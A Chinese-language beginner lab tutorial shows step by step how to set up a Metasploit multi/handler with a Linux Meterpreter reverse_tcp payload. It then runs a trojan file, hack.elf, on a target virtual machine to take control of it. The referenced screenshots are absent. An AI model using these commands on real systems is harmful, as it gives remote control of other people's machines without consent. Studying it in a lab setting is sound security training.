一、背景介绍

Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。Metasploit(msf)究竟威力如何呢？如何利用木马控制受害者主机呢？接下来让我们一起学习！

二、资源装备

1.安装好 Linux的虚拟机一台

2.整装待发的小白一个。

3.安装好的Kali Linux虚拟机一台。

三、攻防实战

3.1 启动Metasploit（msf）渗透测试框架，如下图所示。

命令1：msfconsole

步骤1：利用相应的漏洞利用模块，如下图所示。

命令2：use exploit/multi/handler

步骤2：查看漏洞模块对应的参数，如下图所示。

命令3：show options

步骤3：设置对应的payload方便后续攻击，如下图所示。

命令：set payload linux/x86/meterpreter/reverse_tcp

步骤4：查看该漏洞模块的相关参数，如下图所示。

命令：show options

步骤5：设置对应的参数，如下图所示。

命令：set lhost 193.168.78.169

步骤6：查看配置的参数是否成功，如下图所示。

命令：show options

3.2 运行木马文件，如下图所示。

步骤1：给木马文件赋予执行权限，如下图所示。

命令：chmod +x hack.elf

步骤2：执行木马文件，如下图所示。

命令：./hack.elf

3.3 运行漏洞利用模块，如下图所示。

命令：run

如下图所示，成功拿下目标主机。

查看目标主机的文件系统信息，如下图所示。